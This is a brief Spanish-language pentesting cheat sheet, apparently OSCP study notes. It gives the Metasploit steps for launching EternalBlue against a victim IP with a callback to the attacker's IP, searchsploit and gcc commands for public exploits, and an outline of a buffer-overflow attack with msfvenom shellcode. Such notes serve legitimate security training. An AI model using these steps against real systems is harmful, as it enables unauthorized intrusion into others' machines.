🖥️ Explotación de Sistemas

Ataques directos a servicios de infraestructura, sistemas operativos y binarios.

🔫 Metasploit Framework

La herramienta estándar para lanzar exploits conocidos.

Flujo Básico

1. Buscar: search eternalblue
2. Seleccionar: use exploit/windows/smb/ms17_010_eternalblue
3. Configurar:
   • set RHOSTS <IP_VICTIMA>
   • set LHOST <TU_IP>
4. Lanzar: run

💣 Exploits Públicos (Manual)

Si no quieres usar Metasploit (o para OSCP).

Searchsploit

Busca en la base de datos de Exploit-DB local.

searchsploit Apache 2.4.49
searchsploit -m 12345.py  # Copiar exploit a carpeta actual

Compilación

A veces necesitas compilar exploits en C.

gcc -o exploit exploit.c
./exploit

💥 Buffer Overflow (Básico)

Cuando un programa escribe más datos de los que caben en el buffer, sobrescribiendo la memoria.

Pasos Generales

1. Fuzzing: Encontrar en qué byte crashea la app.
2. Offset: Calcular la distancia exacta al EIP (Instruction Pointer).
3. Bad Chars: Identificar caracteres prohibidos (\x00, \x0a...).
4. Shellcode: Generar payload con msfvenom.
5. Exploit: Enviar payload para tomar control del EIP y saltar a tu shellcode.